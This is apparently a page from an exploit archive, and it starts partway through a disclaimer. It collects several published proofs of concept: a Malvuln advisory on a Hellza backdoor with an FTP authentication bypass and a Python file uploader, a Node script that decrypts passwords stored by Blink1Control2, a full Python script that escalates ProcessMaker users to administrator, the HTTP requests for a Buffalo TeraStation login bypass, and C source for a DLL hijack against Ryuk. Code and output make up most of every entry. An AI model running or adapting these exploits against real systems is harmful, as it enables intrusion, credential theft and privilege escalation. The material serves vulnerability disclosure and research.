malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hellza.120<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP ports 12122, 21. Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.<br />Family: Hellza<br />Type: PE32<br />MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21<br />Vuln ID: MVID-2022-0642<br />Dropped files: msdllsrv.exe<br />Disclosure: 09/19/2022 <br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 21<br />220 HellzAddiction FTP server.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,219,186).<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=56250<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption<br />// Date: 2022-08-12<br />// Exploit Author: p1ckzi<br />// Vendor Homepage: https://thingm.com/<br />// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7<br />// Vulnerable Version: blink1control2 <= 2.2.7<br />// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.<br />// CVE: CVE-2022-35513<br />//<br />// Description:<br />// the blink1control2 app (versions <= 2.2.7) utilises an insecure method<br />// of password storage which can be found by accessing the /blink1/input url<br />// of the api server.<br />// password ciphertext for skype logins and email are listed<br />// and can be decrypted. example usage:<br />// node blink1-pass-decrypt <ciphertext><br />#!/usr/bin/env node<br />const {ArgumentParser} = require('argparse');<br />const simpleCrypt = require('simplecrypt');<br /><br />function exploit() {<br /> const BANNER = '\033[36m\n\<br /> _ _ _ _ _\n\<br /> | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\<br /> | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\<br /> | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\<br /> |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\<br /> |_|\n\<br /> _ _\n\<br /> __| | ___ ___ _ __ _ _ _ __ | |_\n\<br /> / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\<br /> | (_| | __| (__| | | |_| | |_) | |_\n\<br /> \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\<br /> |___/|_|\033[39m';<br /><br /> const PARSER = new ArgumentParser({<br /> description: 'decrypts passwords found at the /blink/input url '<br /> + 'of the blink1control2 api server (version <= 2.2.7 ).'<br /> });<br /> PARSER.add_argument('ciphertext', {<br /> help: 'encrypted password string to use', type: 'str'<br /> });<br /> let args = PARSER.parse_args();<br /><br /> // supplied ciphertext is decrypted with same salt, password, and method<br /> // used for encryption:<br /> try {<br /> let crypt = simpleCrypt({<br /> salt: 'boopdeeboop',<br /> password: 'blink1control',<br /> method: 'aes-192-ecb'<br /> });<br /> let ciphertext = args.ciphertext;<br /> let decrypted = crypt.decrypt(ciphertext);<br /> console.log(BANNER);<br /> console.log('\033[32m[+] decrypted password:\033[39m');<br /> console.log(decrypted);<br /> }<br /> catch (TypeError) {<br /> console.log('\033[33m[!] the submitted hash was invalid.\033[39m');<br /> }<br /> finally {<br /> process.exit(1);<br /> }<br />}<br /><br />exploit()<br /> <br /></code></pre>
<pre><code># Exploit Title: ProcessMaker - User Profile Privilege Escalation<br /># Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. <br /># Date: 20220822<br /># Exploit Author: Sornram Kampeera (Sornram9254)<br /># Vendor Homepage: https://www.processmaker.com<br /># Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/<br /># Version: ProcessMaker before v3.5.4 (Already Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)<br /># Tested on: Windows 11, Debian 11 (WSL2)<br /># CVE : CVE-2022-38577<br /><br />"""<br />Privilege Escalation replication.<br />for 2.5.0 - 3.0 GA:<br /> 1. Log in as normal user.<br /> 2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".<br /> 3. Refresh page to get new role.<br /><br />for 3.2.1 and before:<br /> 1. Log in as normal user.<br /> 2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"<br /> 3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"<br /> 4. Update role to escalation privileges using POST Body request:<br /> POST /sysworkflow/en/neoclassic/roles/roles_Ajax<br /> request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}<br />"""<br /><br />#!/usr/bin/python<br /># TODO: Optimize code [requests module], and Exception Handling.<br /># Replace the variables USERNAME, PASSWORD, and APP_URL.<br />import requests, json, re, argparse, sys<br />USER_AGENT = 'Mozilla/5.0'<br />APP_URL = "http://localhost:9994"<br />USERNAME = '__USER__'<br />PASSWORD = '__PASS__'<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("action", type=str, help="Add or Delete role permission.", nargs="?", default=".")<br /><br />parser.add_argument("-a", "--add", action="store_true", help="Add role permission")<br />parser.add_argument("-d", "--delete", action="store_true", help="Delete role permission")<br />parser.add_argument("-l", "--list", action="store_true", help="List all roles")<br />args = parser.parse_args()<br />if args.add:<br /> action = "assign"<br />elif args.delete:<br /> action = "delete"<br />elif args.list:<br /> action = "list"<br /> print("All Permission UID")<br /> print("View more: https://wiki.processmaker.com/3.3/Roles")<br /> PERM_LIST = """<br />PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGIN<br />PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP<br />PER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERS<br />PER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORY<br />PER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASES<br />PER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASES<br />PER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASE<br />PER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTS<br />PER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISOR<br />PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE<br />PER_UID: 00000000000000000000000000000011, PER_CODE: PM_DASHBOARD<br />PER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAV<br />PER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASE<br />PER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFO<br />PER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEW<br />PER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDER<br />PER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILE<br />PER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASE<br />PER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETE<br />PER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGO<br />PER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAIL<br />PER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDAR<br />PER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIES<br />PER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHE<br />PER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEAT<br />PER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENT<br />PER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLES<br />PER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGIN<br />PER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDS<br />PER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGE<br />PER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKIN<br />PER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDER<br />PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS<br />PER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCES<br />PER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGS<br />PER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASES<br />PER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDAR<br />PER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASE<br />PER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONS<br />PER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAME<br />PER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAME<br />PER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAME<br />PER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAIL<br />PER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESS<br />PER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODE<br />PER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRY<br />PER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGION<br />PER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATION<br />PER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONE<br />PER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITION<br />PER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BY<br />PER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATE<br />PER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDAR<br />PER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUS<br />PER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLE<br />PER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONE<br />PER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGE<br />PER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTS<br />PER_UID: 00000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORD<br />PER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGON<br />PER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTO<br />PER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONS<br />PER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONS<br />PER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""<br /> print(PERM_LIST)<br /> sys.exit()<br />else:<br /> print("Example Permission UID")<br /> SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP<br />>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE<br />>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS<br /><br />python Processmaker-PoC.py --help<br />python Processmaker-PoC.py --list<br />python Processmaker-PoC.py --add 00000000000000000000000000000002<br />python Processmaker-PoC.py --delete 00000000000000000000000000000002"""<br /> print(SAMPLE_PERM_LIST)<br /> sys.exit()<br /><br />PERMISSION_UID = args.action<br /><br />loginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"<br />loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"<br />loginData += "__DynaformName__=sysLogin&"<br />loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"<br />loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"<br />loginData += "form[USR_USERNAME]=" + USERNAME + "&"<br />loginData += "form[USR_PASSWORD_MASK]=&"<br />loginData += "form[USER_ENV]=workflow&"<br />loginData += "form[USER_LANG]=en"<br /><br />def getResponse(rMethod, rHeaders, rUrl,rData=None):<br /> SSL_VERIFY = False<br /> if rMethod == 'GET':<br /> response = requests.get(rUrl, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)<br /> elif rMethod == "POST":<br /> response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)<br /> else:<br /> print("Please choose correct answer")<br /> return response<br /><br />getCookie = getResponse('POST',<br /> {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},<br /> APP_URL + '/sys/en/neoclassic/login/sysLogin',<br /> loginData).cookies['PHPSESSID']<br />if getCookie is not None:<br /> getUserID = getResponse( 'GET',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')<br /> USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]<br /><br /> getRolesName = getResponse('POST',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie,'Content-Type' : 'application/x-www-form-urlencoded', 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',<br /> 'action=userData&USR_UID=' + USER_ID)<br /> <br /> getRolesList = getResponse( 'GET',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')<br /><br /> getRolesPermission = getResponse('POST',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')<br /><br /> roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]<br /><br />def actionRoleResponse():<br /> actionRoleStatus = getResponse('POST',<br /> {'User-Agent': USER_AGENT,'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=' + getCookie,'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',<br /> 'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)<br /> return actionRoleStatus.status_code<br /><br />if actionRoleResponse() == 200:<br /> print(action.capitalize() + " role successfully.")<br />elif actionRoleResponse() == 503:<br /> print("Role already exists.")<br />else:<br /> print("Error!")<br /></code></pre>
<pre><code># Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass<br /># Date: 2022-08-11<br /># Exploit Author: JORDAN GLOVER<br /># Type: WEBAPPS<br /># Platform: HARDWARE<br /># Vendor Homepage: https://www.buffalotech.com/<br /># Model: TeraStation Series<br /># Firmware Version: 1.66<br /># Tested on: Windows 10 <br /><br /><br />An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges.<br /><br />The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS.<br /><br />Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body.<br /><br />If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS.<br /><br /><br />POC #1 Authentication Failure<br /><br />Request<br />POST /dynamic.pl HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 45<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/static/index.html<br /><br />bufaction=verifyLogin&user=Jordan&password=Jordan<br /><br /><br />Response<br />HTTP/1.1 200 OK<br />Content-type: text/html<br />Pragma: no-cache<br />Cache-Control: no-store, no-cache, must-revalidate<br />Cache-Control: post-check=0, pre-check=0<br />Expires: Thu, 01 Dec 1994 16:00:00 GMT<br />Connection: close<br />Date: Mon, 30 Jun 2008 02:39:51 GMT<br />Server: lighttpd/1.4.32<br />Content-Length: 94<br /><br />{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}<br /><br />Incorrect Username or Password <br /><br /><br /><br />POC #2 Authentication Success<br /><br />Request<br />POST /dynamic.pl HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 45<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/static/index.html<br /><br />bufaction=verifyLogin&user=Jordan&password=Jordan<br /><br /><br />Intercepted Response<br />HTTP/1.1 200 OK<br />Content-type: text/html<br />Pragma: no-cache<br />Cache-Control: no-store, no-cache, must-revalidate<br />Cache-Control: post-check=0, pre-check=0<br />Expires: Thu, 01 Dec 1994 16:00:00 GMT<br />Connection: close<br />Date: Mon, 30 Jun 2008 02:39:51 GMT<br />Server: lighttpd/1.4.32<br />Content-Length: 94<br /><br />{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}<br /><br />Login Successful<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5ac0f050f93f86e69026faea1fbb4450.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Ransom.Ryuk.A<br />Vulnerability: Arbitrary Code Execution<br />Description: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Ryuk<br />Type: PE32<br />MD5: 5ac0f050f93f86e69026faea1fbb4450<br />Vuln ID: MVID-2022-0640<br />Disclosure: 09/19/2022<br /><br />Exploit/PoC:<br />1) Compile the following C code as "urlmon.dll"<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "urlmon.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit Ryuk<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c urlmon.c -m32<br />//gcc -shared -o urlmon.dll urlmon.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Ryuk\nPWNED By MALVULN", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
Archives
Categories
- All Exploits 4095
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow